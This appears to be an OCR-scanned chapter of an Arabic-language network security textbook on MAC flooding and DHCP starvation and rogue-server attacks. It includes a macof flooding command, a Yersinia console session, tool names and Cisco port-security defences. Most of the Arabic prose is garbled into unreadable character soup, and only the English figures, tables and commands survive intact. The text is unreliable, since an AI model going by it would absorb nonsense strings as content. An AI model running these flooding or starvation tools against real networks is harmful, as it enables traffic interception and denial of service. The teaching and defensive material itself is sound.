4^-^31 (jjoib ^ j^jj c5^l jW^^ sniffer ^—^-^ cJ^^ lsj^i ls'^ jfi jjj^^ ^5^* ^ b * ^ ^ ls'^ j& ^jj^^ I^a 



Figure: SPAN port. A SPAN port is a port which is configured to receive a copy of every packet that passes through a switch. When connected to the SPAN port, an attacker can compromise the entire network. The figure shows a protocol analyzer on the SPAN port and an IDS on the IDS port, with hosts on the remaining switch ports.
MAC Attacks 8.2 



Jjil^j jl till ^jujj c^ill j j» cs^f^ j& Sniffer -Mj ^-^-^ <jiat jiict Sniffer ^ '^-M-^ 

<L^)iaj a ikiLujj Sniffing ^ ls* *3<^*ti ^\ laal a£jjoJ! j>J Uj jjIS ~ laJLujj Sniffing .5^juJI jjj-* 

1VIAC Flooding .^^c (j^Iaj Sniffing .j^l tdAiLJtj 4 jjuJI < ** >1 <JiLa i » ^ » ^ It CjU» jla^Jt 4ijjui <JiLa jjIS jjc. 

.Sniffing cjLSj c> s^l j 

.MAC *U s^bja^l jjjI^iIIj cMAC Flooding <^t j^l 'MAC \:° v; ^ ^^lai^JI clAjjSj]) t*U ^ILj ^all 11a 



MAC Address/CAM Table 

l£ ^j* J^A? cs^ (hardware address) ^ j^II j* j Media Access Control -5 jU-a^l ^ Mac 

64£jJo3I ^j^jjjjjuj ^^ic (Jjti ^iiAj MAC 4<^i ^Jc. jl^. .(a^jj^JI Cjj\£) 4£jJo3I ^ (node) & , -^ c ' 

(jjdfij La^J (jjj^£ ^ J^-J ^>^^ L a OO^' <^1^J C5-^^ 4^Jjuj d <J£ .A£jjuo3I ».vv%, ^ S^t j (JJJ*J (j^uJl 

JS* CjUjIxJ! jj j^L ^jL <jj .hub ■!! <ij*3 ^ ^ j content addressable memory J J^lkt ^ CAM 

Catalyst switches *JaJ CAM J f^^j VLAN CjUI** iallJI ^ Sja ii*lt MAC l^j^ 

<j ^UJt iaiJI j ^ CAM Jj^ MAC ^ .j^^ 4£±A <L^alJ i Sj^iU MAC ols^ cl^j^ 

.dijUi CA1VI <J -^—^j^] ^^j^ 3 ] cJ^j^ u^j^^ '^-^ jlx-<JI ^ 

RAM o-te ^ <^^ 1 RAM ^ opposite ^ ^j^j s j^'^' (> ^ S J^ > CAM 

VRAM lh^ jk JiUlj 

C . illaJ Ld^JC ^aJ ^j-d j l^j djULiill Ql^j^JJ (Jjistjulill ^aUaj ^aj^J (RA1VI) jjuIsJI 
l^jj j^JJ fjL c _^j3I djULlJl ^1 ja! iaSl^. (jj^J (jl cJ^iJlill ^aUaj (jl I^A ^5^-^ J 6 1000 (j' J^*"^ ^5^* ^^U^ 2! J^J^^ ^ 

^ dla^JJ Igili l^la CjUUj L-AL ^jj La^JC Liajl RAM j-u^Jl SjStilt jli J£ I^A (JjjJj .(RAM) jj^xJI ojSlil! C5 ic^ 

.CjUUJI (j-aUJIlOOO u' ^ 3K»»i^t CjUUJI 

tit <*JJJUJ <9JjIaJ I g AO dlaall J ^ajL SjSlill (j-ft ^ jilt ti& <J ClAiUj J^iLudl ^allaj L-AL Hxi CAM <^ J^* 1 ^ ^jSl 

CAM searches the entire memory in one operation 

^^UJ t*Uij RAM (> liUl jSl J 

CAM lU^j Binary CAM CAM c> ^ j* o^jJt ^ CAM u 1 liA c> 

.lj 0 cj^UJt ^t^ki^U 

Figure: a 48-bit hexadecimal number creates a unique Layer Two address (written as three groups of four hex digits).

First 24 bits = manufacturer code, assigned by IEEE.

Second 24 bits = specific interface, assigned by the manufacturer.

Broadcast address: FFFF.FFFF.FFFF.






?(How Cam Works) CAM J) uLS 

http : //w ww . f reetechexams . com : j^iJI 

ial_L<Jl Q±l CjVIj^jVI lafll L— _^jjjjjjjoj dljjjjl (j-G D^cLaui £A ^AaajujJj CjIjjI^aI] ^^fLixilip <J£juJ| jjJjoLi CA1VI <J J-^?^ 

^Jc. <j Jj^al<Jlj <1 JjLLai^ iiixJIj a£jJo3I C5 ic o^ixj (j^aliJI t*lL* ^jl jixJI) MAC <jl CjI jLoiaj lafllaj CAM table 

(jjUjjjuJ! q\a jA ^ a jjL^ii <^^j MAC u^j^" CA1VI lSj'-^^ c3^^)^] l! 1 l^j . \? w ^ c ^ ^ t° o^j^^ (u^j^^ 

Jld (JjlxJjoiJ (j^^i^l .J jj^akxJl L_flJjJa*3l djUUJl J jj^a j (jLdjJa <J^I <>a <Lj]a3l £>i^j J-dXJ CAM table .HUB c^j 

13 bSljiuUll (j^jjoJU JL^jVI C5 i^ Ijii ^VJI /^i>*ll t>v c> CAM Jj^ ^ 

.CjUUJI rurtuW a! j^oij ^j^j <ula ^Ethernet segment 



Figure: how the CAM table is built.

1. MAC A sends an ARP for B. The switch records "A is on port 1" and, not knowing B yet, floods the ARP to MAC B and MAC C.

2. B answers "I am MAC B". The switch records "B is on port 2" and the reply reaches MAC A.

3. Traffic A -> B is now sent only to port 2. MAC C does not see the traffic to B.

CAM table after step 2: A on port 1, B on port 2, C not yet learned.



?J-al£JL CAM Jj^ cj&aj liU 

Aj^UJI dj^LiU-All j ^j^jjjjjaJI iaLLa ^^ic Sja jl<JI MAC CteJ^ j^*-* CAM J j-^ 

^ j^JI pLL tilj^oj ^ j^Jl tikJL^ 11a ^hviJ cilj£ a) fus a-s^\\ ^ * j^-a CAM J jl^JI ^ jSS j 4JajjjJt VLAN 
J j MAC ojj^ c> ( ? MAC Flooding .MAC Flooding c> $^L^ ^ 

4_i^uJa3l t auU^I ^ <iujjJl CjljUaVl j MAC L^J^ 3 ^ CAM Jj^ Sj^l ( <^^^ C^^^ ^J^^ ^-^J^ 

:CAM Jj^ cjlc- J^] uj^ >>> Ullj^ 



Figure: CAM table overflow. The attacker on port 3 (MAC C) sends frames with bogus source addresses ("Y is on port 3", "Z is on port 3", ...) until the table fills: Y on port 3, Z on port 3, C on port 3. Traffic A -> B can no longer be matched to a port and is flooded, so MAC C can see the traffic from A to B.
MAC Flooding 

^ JslI aAJahjxA] £>i& ,a£jjoJI j\ A^u'iM ^laa iaj^j ^j^j ^ill j 4£jjuJI ^j2L^juj <j^l jjl jlkV *La^vim^l 4 j vffll MAC flooding 
'hub ls^ 0 ■ CAMJj^ (S^- u>* o^L*^ ^ <y-aJI 4_pLJI iaUJI Jl s<^i MAC l&j^ u^*^ 

d^j^a Sj^li iSj^i (J^J^^ A cJ^-^- (j* J^^^ ^ajsu* Jl jj V 6(j^Jj .hub (3-^ 4<^.* ^ <jjtLJL ULal jj£I 

ajjSjII .AjLj^all U^j^ i> j^' MAC cl^j^ W^'j^' (4j hub J) Jj^s ^ c>j MAC u^j^ Jj'^ 

.MAC Flooding j- w * ^jj^J 4_^Lai^ Cjli (jjiijjjuJI Jc ^Lajtall 4£jjuJI c > >i Jalij (J^UiLujV <Lg,i^jjuia3I 

4 K > f >i ^ j^-laj V jll jjj^a>JI MAC o^j^- cijUlkj ^j^lLjjoJI (jljc-l Jc- MAC Flooding ^h^j l5 

(J^lLjjoJI C5 1c ^j^.1 djUlla ^1 t J^1£3U MAC u^j^- J J-*^ u' ^j^-^ ,iLftl£ MAC o&j^*-} <-5 j^ 1 ?^ ^ci* A 
^ J) ^ fj^j hub failopen mode <*^jil J .failopen mode J Jj*^l 

Attackers perform MAC flooding to gain system passwords, access to sensitive data such as protected files, emails, and instant message conversations.




Figure: MAC address flood sent by the attacker to the switch; User A is connected to the same switch.




MAC Flooding Switches with Macof 

http ://monke y. or g : j^-a^ll 

^Jtdjj ttillil A a^ilj .(jLdVl 6^3^ U^J 'e-t^V! (S !>L^al A aax^a ^jjjjJjjuJU <j^aLaJI 4^ jlill 4_i^aL^. ^jl DjLujVl 

W^j Uui ialixJI ^^ic jj^Jl ^^>^ lS^ ^— ^ u^j^^ l5*^ ( ♦ 1 - u1> l- clA^ tdiVl^JI o^asu t^^kl SjUxjj .hub 

.hub ^ 

djVU.^VI J jj^a jll jl S^ljSSI Sj^lS jjc^ ^j^aj U l^Jla j MAC cl^j^ ^ (i'j^-'j fij^'^l 6 ^ iilLuiV 

4^^)^. CIdj 4 lal i oJ J£j ^jjIijjjaJlj t^ix-a ^jl jixl - gall CjjjJ! ^AaJ 4 i£ V (JjUjjjuJI ^jV .CjIjjjJI (jg& 1VIAC ^ ^ ^ 1 

a£j^. Aja. jj ^ ^j^LijjjaJI JJas 4 lal > njj ^^-istj fail open f jg^a ."fail open" ^-a^a ji ^ ^ ^^>sj .^LlJI jj^>^^ 

.iallJI 4il£ ^glc J^jj 'hub ^ t3^>^l jjj^I 

<Lj]a3l j/Vi fail close ^ j 1 ^ ^ j ^^ill LijLJjijjjaJI ."fail close " ^ ^U^lLjjoJI (j^aau ^l^cl ajj ^jU Jc (jj^i (jl < ; 
4JaLauj tiaLL<JI Ail^ Jc jj^Jl ^^>^- lS^ ^— ^ (jl V^j (j^LjjaJI ^jl c_ _(jjjjjjjual3 fail open cJ-^ ^ a 4j.u£tJ1 

Ij^li du£ lil lLli^ , ji& ( . nr> 4jJ ^l^cVI I^A ^jli t j^Ia jl ^jljlkl jn^ a£ ^jli ttilli ^ j .UiLdj jj^Jl ^J^- (jc L_fl3 j!i3l 

iklj (jl (jjud^Jjoi^Jl ^j^a ,4£jjaJl JJ^ ^^>^- Jc dl> gaUl] D^iixJl t fljl jll ^j>i ^jAslSI j3 jj ^^jII CjIj^VI (j-a 6 jllxui <C j^^ o ^^Jfc Dsniff 

'macof W^j 'Dug Song dsniff cjIj^Vi <> s^lj .dsniff ^ 4 ^ > ^^ t JjIjjIIj cjIj^Vi <*^l ci^jJI 
(jjjjjjjuJ! <jl£ tfail open ^ j > ^ ^ o^j^^ ^1^1 ^ lij .4^1 j-u^JI ]VIAC l>* WVI ^ (jjiijjjuJ! Jjljc-] c _ 5 ic U3 j^jj 
^j^jjjjjaJI ^ ^jUlSjVI jjJI c . \\*'\\\ till ^-<ujjj l_s jjoj 11a j .ialldll ^^Jc jj^Ji ^j^- lS^ ^— hub uj^ '^£J j** 
<J£J 13b000) lMl^A? o- 3 ^ CAM J j^ staVl ^ . jl^aJI >^ ^1 jj>* J£ c^-aSl! j 
}Ji jUl jiLl ^ ^JW! j^Vl jl^-aj (Jjj^ > W 6g _K ^ Macof ^ jj> MAC ^VU^j JL* jj JjjL <> 

macof -i ethO -s 192.168.18.130 -d 192.168.18.2 

^jjjUc j>» (Jljc-jj macof g-a^-o^ ^ .^^-o^ e-lciLuiV "macof" ^I^JLuit ^jj t^UI JtLJI ^ 

.<lo MAC OLS^ J^jj fV 1 <J^^' ^ O- 3 ^ JJJ*^ A^JI AiUaJ ^j^j] jjjxjII J>lkU .MAC 

JUg Jllll <j£Ja3l U^J (J^l^Jl ^ J^g-^ L>* c J' 4-6-^" J^ ^J^j] "-d" J^f*^l ^l^Vlm! ^1} . j.'U^l <jt jJC ^j^j] ^^h»J "-<§" 

6 jjt > <c. j^ ^ j ^macof ~ i^jLuiaSI (^^-^ 



#macof [-i interface] [-s src] [-d dst] [-e tha] [-x sport] [-y dport] [-n times]

-i interface   Specify the interface to send on.
-s src         Specify source IP address.
-d dst         Specify destination IP address.
-e tha         Specify target hardware address.
-x sport       Specify TCP source port.
-y dport       Specify TCP destination port.
-n times       Specify the number of packets to send.



j l dbau] C5 ikj3! (Jj^j Lg^jc- iaaa Ajjilll a I iklujl ciLlc 



MAC Flooding Tool: Yersinia 

http://www.yersinia.net : j^^JI 

I jUaj L^jL ^Uajj l^Jl / alia all CjV j^j^ ^ L_axjja3l Jallj (j^asu s^liiuiiU a ^ ^ - ^ ^ 4£jjuj sbl Yersinia 

.<-JajVl j djl£^JI jbikl j JJ^j] (framework) 

Spanning Tree Protocol (STP) 

Cisco Discovery Protocol (CDP) 

Dynamic Trunking Protocol (DTP) 

Dynamic Host Configuration Protocol (DHCP) 

Hot Standby Router Protocol (HSRP) 

IEEE 802.1Q 

IEEE 802.1X 
Inter-Switch Link Protocol (ISL) 
VLAN Trunking Protocol (VTP) 
prodigy:/home/tomac/work/projects/yersinia-sf/yersinia/yersinia/src# telnet localhost 12000
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.

Welcome to yersinia version 0.5.5.1.
Copyright 2004 Slay & Tomac.

login: root
password:

MOTD: Do you have ... xicon LX-7? Share it!

yersinia> en
Password:
yersinia# sh
  attacks     Show running attacks
  cdp         Cisco Discovery Protocol (CDP) information
  dhcp        Dynamic Host Configuration Protocol (DHCP) information
  dot1q       802.1Q information
  dtp         Dynamic Trunking Protocol (DTP) information
  history     Display the session command history
  hsrp        Hot Standby Router Protocol (HSRP) information
  interfaces  Interface status
  stats       Show statistics
  stp         Spanning Tree Protocol (STP) information
  users       Display information about terminal lines
  version     System hardware and software status
  vtp         Virtual Trunking Protocol (VTP) information
yersinia# sh ver
Chaos Internetwork Operating System Software
yersinia (tm) Software (i386), Version 0.5.5.1, RELEASE SOFTWARE
Copyright (c) 2004-2004 by tomac & Slay, Inc.
Compiled Sun 07-Aug-2005 21:10 by someone

yersinia uptime is 51 seconds

Running Multithreading Image on Linux 2.6.12.3 supporting:
01 console terminal(s)
02 tty terminal(s)
05 vty terminal(s)

yersinia# sh users
User    Terminal    From    Since
* root
yersinia#

MAC Flooding Tool: Scapy 



<illi£ j jj ^ > * q * j ' sniff (O^ lS^j^ ^AaajauiH o^-^ uj-^W lt^^ .-^^ u >i< ^ lS^^jII ^ > ^ ^ atal ^ASu^ 

.CjI^JjuJI ^\ j £JJJ j c LujJ^J q\ £j laJ > uJ Jill CjI j^VI ^.lAiJ ^ajujJ 4_iLli3l £>i& j '^-AjJjjj 

< tcpdump* NmapJ *l j^l cs^j pOf * arping* arp-sk< arpspoof^^j < HpingSj^Jt sbVI u' 

. string Jlj loop Jt J ^ v^" .. n u' <y^^ <>d£k ^ ^ J** * J^°) 2-*^ J^' u' ■ tsharkJtj 



MAC ^U^fSI -l^a jilJj 

MAC**-^ ^-9-^ j^jolloj l^istjjaj ^^jII ( port security ) ^sUaII ^1 *^ 'o^j^ ^ ^'^^ dlj£ 

^joij Jill j (JaxJI CjLL^q ^ MAC u^j^- '^^j *^\* 6 ^^-^t cJ^.i Port security 

!c5 jVI£ WVI j^I^U J^V! cj^j 

,<iaVt MAC L^J^ C5^oSVl Jj J J^ 3 jJl ^ S^J r4j 

. JlLjjoJI J sj.w<ftll MAC l^j^* C5^) J J j^-^ cj^^ <Ja^J3 MAC l^^ 3 ^ ^ ^•^c 

Cy* cl^ U^J^*^^ J MAC U^J^ C ' yjj a 1 ^ ^ t^iixJl Jc 4_L<il ]VIAC cl^J^ c ' ls 1 •^^^ ^ ^^>?^ 

:^Vl cj^I ^jU! 
.(#switchport port-security mac-address) <4*Jb j*\J <iaVl MAC u^j^ ^ ^]

jjj^aldll 6 j^VU 4j^abaJI MAC cl^J^* (J^j ^_L<J MAC U^J^ f (jW ^UuJl iilj£ «j 

.SNMP trap < J&jj MAC Flooding ^Ua^ <> ^ p 0 rt security 

pbjL ji^u^ LjLiljj^ ^ Port security 

#switchport port-security 

Mac Address -5 ^l^t ^1 <iLjaVU o^jjuJI <jpteJ ^ o^L*^ ^1 <JUJla Port Security ciw ^ jl> 

U^ij j (J^lLjjoJIj JL^ajVI ^^ic j^lill ^i^. jll (Jj^j ^— a jjuj djjjJI J > ^alj l_s jjoj Mac Address djl eg * J 
^Ul! j-^Vl (jiiijjjaJlj JL^aj!>l! ^jjjjj^l t^lLa ^ j^V ^-<u.ni <jl U^jl j3 aJL^. ^ L*l Mac Flooding ? ^ j* 
#switchport port-security maximum 3 vlan access 

^Ull J-^Vl ^ J^l (JjjjJjJuJl (J ^llalalJ 

#switchport port-security mac-address 0011.2233.4455

tilUJI JjI^jolL ^jjjjjjjaJI ^>f^i j Sticky^-^ u^j-^ ^ £J ^ * ^ lS^j^ j ^ 1^ ^jl cj^. j j] 

j^V! Static Mac Address ^ ^jjJt ^ o^j^ 

#switchport port-security mac-address sticky 
#switchport port-security violation restrict 

restrict ^protect 'shutdown ^ 

#switchport port-security aging time 2 
#switchport port-security aging type inactivity 
#snmp-server enable traps port-security trap-rate 5 
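To see what the port-security settings above actually do to a flood of forged source MACs, here is an added simulation (not from the book) of a single switch port: it models maximum, the three violation modes, sticky learning and aging type inactivity; time is counted in minutes to match aging time, and the MAC values are constructed.

```python
"""Port-security model for the MAC flooding defence configured above.

Added example, not from the book: it simulates how a switch port configured
with 'switchport port-security maximum N', a violation mode, sticky learning
and inactivity aging behaves when frames with many forged source MACs arrive.
Times are minutes, to match 'aging time'.
"""
from dataclasses import dataclass, field
from typing import Dict, List, Optional


@dataclass
class PortSecurity:
    maximum: int = 1                    # switchport port-security maximum N
    violation: str = "shutdown"         # shutdown | restrict | protect
    sticky: bool = False                # mac-address sticky: learned MACs are kept, never aged
    aging_time: Optional[int] = None    # aging time in minutes; None disables aging
    aging_type: str = "absolute"        # absolute | inactivity
    static: List[str] = field(default_factory=list)              # mac-address H.H.H entries
    learned: Dict[str, List[int]] = field(default_factory=dict)  # mac -> [first seen, last seen]
    violations: int = 0
    err_disabled: bool = False
    log: List[str] = field(default_factory=list)

    def _expire(self, now: int) -> None:
        """Age out dynamically learned MACs (sticky and static entries never age)."""
        if self.aging_time is None or self.sticky:
            return
        for mac, (first, last) in list(self.learned.items()):
            age = now - (last if self.aging_type == "inactivity" else first)
            if age >= self.aging_time:
                del self.learned[mac]
                self.log.append(f"t={now} aged out {mac}")

    def receive(self, src_mac: str, now: int) -> bool:
        """Handle one ingress frame; True if forwarded, False if dropped."""
        if self.err_disabled:
            return False
        self._expire(now)
        if src_mac in self.static:
            return True
        if src_mac in self.learned:
            self.learned[src_mac][1] = now
            return True
        if len(self.static) + len(self.learned) < self.maximum:
            self.learned[src_mac] = [now, now]
            self.log.append(f"t={now} learned {src_mac}")
            return True
        # Secure-address limit reached: this frame is a violation.
        if self.violation == "shutdown":
            self.violations += 1
            self.err_disabled = True
            self.log.append(f"t={now} violation by {src_mac}: port err-disabled")
        elif self.violation == "restrict":
            self.violations += 1          # counter increments and an SNMP trap is sent
            self.log.append(f"t={now} violation by {src_mac}: dropped, trap sent")
        # protect: frame dropped silently, no counter, no trap
        return False


def flood(port: PortSecurity, n_frames: int, now: int = 0) -> int:
    """Offer n_frames frames from distinct constructed source MACs; return how many get through."""
    forwarded = 0
    for i in range(n_frames):
        mac = "02:00:00:%02x:%02x:%02x" % ((i >> 16) & 0xFF, (i >> 8) & 0xFF, i & 0xFF)
        if port.receive(mac, now):
            forwarded += 1
    return forwarded


if __name__ == "__main__":
    p = PortSecurity(maximum=3, violation="restrict")
    print(f"forwarded {flood(p, 1000)} of 1000 flood frames, {p.violations} violations")
```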




8.3 DHCP Attacks



j\ JL^ajVI ^SaA jjj-a db^aiilU ^lxujjj c _^j3I 6 MAC^W^j Ailia^lt sniffing ^ liuifllj ^13 

djU^A t£)[JCP lUc- ^jaill 11a c .sniffing 

csSI^jjI >j c DHCP^W^ 

.DHCP ^ ^la^ll j ^rogue server j starvation ^ ch\ j^Vl j 'DHCP starvation 

?DHCP (>u uL£ 

Jj^jjjjJ! tiA .RFC 2131 'Dynamic Host Configuration Protocol J jU^I y> DHCP 

^ jLjaSli dVU .TCP/IP ^ c> Workstations J Hosts J» IP ojj^ 
J£al> ojjUJI ^-H ^) t> jSSV IP u'j^ ^t^j^t (IP address conflict) ojj^t

default gateway ^£±^1 ^1^1 4ll*i<JI csj^Vl CjU Liajl DHCP ^ 6 IPu^ <J] <sL-^yU 
. (traffic broadcasting) ^ J ^UA> <ci^]l DHCP jW ^ ^ .subnet maskj 

j^J < Lij^q Jj ^I^VI CjU jlx-d jj><^ jUal jjs jj ^ 4£jj^3U JL^aj^U jjau u^U jp djbl^l (j^il DHCP ^l^klujl 
kaijj jjgn^ti IP ^Jjj .< qVi^ ^1 j jl ^ jill L >ij J ^UJI Jj l-iIL *t£L DHCP f j^. TCP/IP^f^ 1 

.lease offer J J^ DHCP ^ill *:>Ux]] a<^\ cjbl^l j^jj <ul 

:(DHCP Lease Stages) j*> IP OtjS* J*t>* 
^ uVj IP ^ (DHCP DISCOVER) UU» broadcast lUj^ :DHCP DISCOVER lJU^VI -1 
jl 0.0.0.0 j ***jM u»>^ 255.255.255.255 ^ DHCP ^ u'j^ IP jlj^ ^ V 0-~j| 

.*£*51l Je. s ja jUl DHCP (Ol > Jl (unicasts) ^ J ^ ^ <>j J^l <^U= J=£L DHCP-relay agent -2 
(DHCP OFFER) *Vj J^jU pJ B DHCP ^ J] DHCP DISCOVER J^o^ :DHCP OFFER lP=j*1' -3 
J*«J1 MAC u 1 j^ 1 - network mask ^ill DHCP IP u 1 :i>^ broadcast J^ Jc- 

ejlc-LoJlj lease period jW^V °- la ~ 
ptU ax, c^.DHCPREQUEST d^M DHCPOFFER J] 0^1 c,^!^ :DHCP REQUEST ^ 4 
i > > h 'l; broadcast JLu> jj (i^j^ u^!r? 'o^j^*^^ u^j^^ ^j^j DHCP c> lP 3 J^«J^ 

u^j^^ ^jj U-^jj^ J^U f^j ojt ^ ^ c5 j^' o^jj^ cr^^ DHCP 5^ -5 

.unavailable ^ ^-j^ Jj^i u^j^^ ^ available u^j^ 

cUj, ^ ^il! ^ikll DHCP REQUEST J^-j ^ :DHCP ACKNOWLEDGMENT j»JVI 6 

.broadcast lS^ ^ij c_j jixJI jl£ lij NACK JjjS ^ jl ACK J t 

J ^jbu l^j^ ^ ^ .c>j^ c> J aJl s^l j u^J) 3 ^ DHCP DISCOVER jj ^ -7 

JLa. Jj ;IaAsu ^jla^ ^jiiAaJ A \j\ a <ul j.<u>.>iJj .AjjIj J^ 0 — 1000 U£ J J ^ lC ' ^A^j (Jj^^ Jj ^i^aj 16,13,6 J 3 ^ 

.DHCP Troubleshooting *U>iVl M*- t» J-^l <4i J^' 

^ jll cjli Ail _jj ? jUJI ^^kloy .^alaJI JJ DHCP DICOVER jV ^jll (port) 67 J^l -8 

^JjIaslSI Jc t . jll <jI j& 68 j^^j j ^ l j& 67 



[Figure: DHCP request/reply exchange. Client to server: DHCPDISCOVER (IPv4) / SOLICIT (IPv6), "Send my DHCP configuration information"; DHCPREQUEST (IPv4) / REQUEST (IPv6), broadcast. Server to client: DHCPACK (IPv4) / REPLY (IPv6), unicast, "Here is your configuration": subnet mask, default gateway 10.0.0.1, DNS servers, lease time 2 days.]

DHCP REQUEST/REPLY MESSAGES

jc. J _ y^aJ3 ^JaioLi request/reply exchange ^l-i^l <j^>j (IP) c±>j±>y\ J j£ jjjjj jljjc Jc J*i3lj c5jisu <^jll jU^JI 
JL* J (> Jx«J! ^i^i jjill Jc tDHCP offer -SI DHCP Jiy .DHCP ^ <> cs >Vl oij^ 1 o5L.U- 
.DHCP Jl c5>Vl CjI j^a p jii-3 Jl jj V IP oijUt Jt J^Jl DHCP V Jll s j^Vl .DHCP request 

DHCP ^LaaL .a£j^1I ajLSI JUjI jajl« ^SL i_ilki Jllj DHCPINFORM ^ J^*H 
DHCP J$ lij .DHCPACK ^ J\ DHCP 'V^ 1 j^VI cj!>U**1I J/j cj^I^J! ^

A^SL ^illj IP jl jixJ ^joJ DHCP (reserved pool) * jj*^* Aiki* y-i y> ^ill jt^ jj& <> request 

-UJ^J j SjJ?^* Alkia ^ IP jJC j <j£ *■) DHCP -C5^W o^j*^ ^ JP*4 DHCP CM 'DHCP 





DHCPv4 Message   DHCPv6 Message                    Description
DHCPDISCOVER     Solicit                           Client broadcast to locate available servers.
DHCPOFFER        Advertise                         Server to client in response to DHCPDISCOVER with offer of configuration parameters.
DHCPREQUEST      Request, Confirm, Renew, Rebind   Client message to servers either (a) requesting offered parameters, (b) confirming correctness of previously allocated address, or (c) extending the lease period.
DHCPACK          Reply                             Server to client with configuration parameters, including committed network address.
DHCPRELEASE      Release                           Client to server relinquishing network address and cancelling remaining lease.
DHCPDECLINE      Decline                           Client to server indicating network address is already in use.
N/A              Reconfigure                       Server tells the client that it has new or updated configuration settings. The client then sends either a Renew/Reply or Information-request/Reply transaction to get the updated information.
DHCPINFORM       Information-request               Client to server, asking only for local configuration parameters; client already has externally configured network address.
N/A              Relay-forward                     A relay agent sends a Relay-forward message to relay messages to servers, either directly or through another relay agent.
N/A              Relay-reply                       A server sends a Relay-reply message to a relay agent containing a message that the relay agent delivers to a client.
DHCPNAK          N/A                               Server to client indicating client's notion of network address is incorrect (e.g., client has moved to new subnet) or client's lease has expired.



IPv4 DHCP Packet Format 

IP <jjjUc (JJJ*JJ .^£iJuJl 6 ^l^cl (Jjjia (jC IP A^jJj C5 ic CjVU^ajVl (j^-^ LS^\ J J^JJ^ (DHCP) 

;L_fljUa jll DHCP . ^y^xM ^-i <£jjua3l ^^ic (JU^jVI L — ^ j jii * V CjU* jlx-<J! Ia j^c-j 

u ^j > ^ j^Vlj (delivering host-specific configuration parameters) < ii i ^ l Odj^ ^->^-A*-* jjSjj jA ^Ij 

. (allocating network addresses to hosts)u^^ ojj^ 
aJI^j ^ U£ ^ <jJ DHCP ^ j . DHCP*^ j DHCP DHCPct^ j c> uj 

41^5 ^Uj, ^Ull liA JUlbj ^BOOTP relay agents DHCP ^ .BOOTP 

. DHCP^-^ t- lUI^I J^i c> BOOTP 
:IPv4 DHCP ^> c^^l r*JS Cxh 
FIELD                              OCTETS     DESCRIPTION
OP Code                            1          Message op code that represents the message type: 1 = BOOTREQUEST, 2 = BOOTREPLY
Hardware Address Type              1          Hardware address type as defined by the Internet Assigned Numbers Authority (IANA) (e.g., 1 = 10Mb Ethernet)
Hardware Address Length            1          Hardware address length in octets (6 for Ethernet)
Hops                               1          Set to 0 by DHCP clients; optionally used by relay agents to count the number of relays that forwarded the message
Transaction ID (XID)               4          A random number chosen by the client to associate the request messages and their responses between a client and a server
Seconds                            2          Seconds elapsed since the client began the address acquisition or renewal process
Flags                              2          Flags set by the client. Example: if the client cannot receive unicast IP datagrams, the broadcast flag is set
Client IP Address (CIADDR)         4          Used when the client already has an IP address and can respond to ARP requests
Your IP Address (YIADDR)           4          Address assigned by the DHCP server to the DHCP client
Server IP Address (SIADDR)         4          Server's IP address (the next server to use in the bootstrap)
Gateway IP Address (GIADDR)        4          IP address of the relay agent, used when the message passes through a DHCP relay
Client Hardware Address (CHADDR)   16         Hardware address of the client
Server Name (SNAME)                64         Optional server host name
File Name                          128        Name of the file containing the BOOTP client's boot image
DHCP Options                       Variable   Optional parameters (DHCP options)





DHCP Starvation Attack 



f^iauj DHCP t> x& J^j) <j*L>^ t> DHCP ^ c3>>k 'DHCP Starvation 

4t*Bi <> JSI IP o^j^ lS^ lA^ V fiL*ll (jla 4t*Uil j . DHCP^^ ^ ^ iaAlJI IP u^j^ 

^UlUj tl^j 4_^UJ! ip (JjjUc^ ^j^j ji J jj^aaJ I ^^kiai^ll ji^j V <ii t ^jjjaSl I t ju.ti .denial of service (Dos) ? J] 
.Gobbler ^ s^L^ MAC ojj^ DHCP ^W^ 3 ^ f ^W*^




[Figure: DHCP starvation attack. The attacker sends many different DHCP requests with many source MACs; the DHCP server runs out of IP addresses in its scope (10.10.10.1, 10.10.10.2, 10.10.10.3, 10.10.10.4 ... 10.10.10.254) to allocate to valid users, so the user is unable to get a valid IP address.]




DHCP Starvation Attack Tools 

.DHCP Starvation jj^l^ll JjS cj! j^Vl Yersinia j Dhcpstarv 

Dhcpstarv *k 

http://dhcpstarv.sourceforge.net 
DHCP leases^J^ <*j^j .DHCP Starvation ^^il ^ jBj ^xS^A JjiJsil ^Ikb ft bi ^ Dhcpstarv 

Yersinia 

http://www.yersinia.net

IP ols^ u^ 3 ^ " b y^ (DOS-based packet sniffer) o*j<£\ ^ ru^vi ^ yt> Gobbler 

^UujoII dijjjjj DHCP cj^j^-^ Gobbler - ikiuij .DHCP <*-^f^ j^- l a 4-*^^>^ 4-*^-^ sbVI a - ^ .< ^Ja^l] 
Gobbler ^v^>hj .Jvn^l c ^jja^Il ^ jjl! C5 ic c_ u^aUli ^^ic j^ta (jl 4-ijt£-al i-aL^al ^ '<kc*jjA\ a\<\\a\\ iat_L<JI (j^^qj 
Ai^x-<i till ^ajujj Gobbler .^Jl ^^lA^ DHCP Starvation ^ ^jj LgJ!>Lk ^UJI j^ll dj| j^l ajLiicb 




Rogue DHCP Server Attack 

fjc. s j^ll 4jJ liA Rogue server .^Jl ^ aIL^L ^1^3! e DHCP ^ j& d jU^ jA ^Rogue DHCP server 
j Rogue server ^™ ^ L ^ 31 J c> ^ j« .DHCPDISCOVERY^^xJI U^VI 

Rogue cr^S cr^^ . c> ^3 ^-*J^^ J ( JJ^" >I1 J ^ ^UJI t C5 ijiiJ!/ C5 ixi3l DHCP 
*5LutII ^L»^LJ! CjL» jIslxJI .Rogue server J^**^ * £>i& aac t C5 i*i3l DHCP ^^-^ lM* Vjl <LAa2uiVI server

. DoS^ jmj ^ <^=^\ JL^sjVI a^jj^ J jj^a j Ji«j (j^Ai Rogue server ^ 



.Default gateway u^W^ IP u^j^ f ^DHCP Rogue DHCP ^Ui^l 

(j-<» ^ jill 11a ^jc l_Lu£3I (j^j V .^.^ 1 ^ cJ^^ cJ-^ ^c^ 1 4 l5^**^ ^-^-j 4_LjaljjaVl gateway 

jiL ^jij Rouge .DHCP Rouge * - DHCP <^I^1ujI iy* 'J^*-^ <u^^ u^ 1 * j <^ 

j^*^ j^V ^ -ciA** uj^ ^-^-^ rouge f 'DHCP Rouge i> < ^^13 

.4^1 jll cilti J\ J >J3 DHCP ^ j ^ 




"9 1" — ■ 

